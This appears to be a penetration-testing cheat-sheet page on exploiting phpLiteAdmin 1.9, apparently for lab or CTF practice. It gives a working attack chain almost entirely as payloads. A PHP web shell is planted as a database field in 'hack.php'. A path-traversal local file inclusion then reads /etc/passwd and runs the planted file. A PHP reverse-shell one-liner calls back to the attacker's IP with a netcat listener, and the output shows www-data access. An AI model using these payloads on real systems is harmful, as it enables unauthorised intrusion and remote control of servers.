phpLite

PHP Code Injection

https://www.exploit-db.com/exploits/24044
Create an evil database entry that lets you execute php
created in the directory: /var/tmp

-------------------
> searchsploit phpLiteAdmin 1.9

-------------------
Create Database : hack.php
Create New table: hack (1 field)
Field: <?php echo system($_REQUEST ["cmd"]); ?>
Type: TEXT

Local File Inclusion (LFI)

You will need an LFI to execute the php code you just created

http://xxx.com/manage.php?notes=/myNotes/../../../../../../../../etc/passwd
http://xxx.com/manage.php?notes=/myNotes/../../../../var/tmp/hack.php&cmd=ls

URL Encode this:
.. &cmd=php -r '$sock=fsockopen("$MyIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

nc -nvlp 4444
whoami ..www-data

Previousphp type juggling NextWeb Injections

Last updated 1 year ago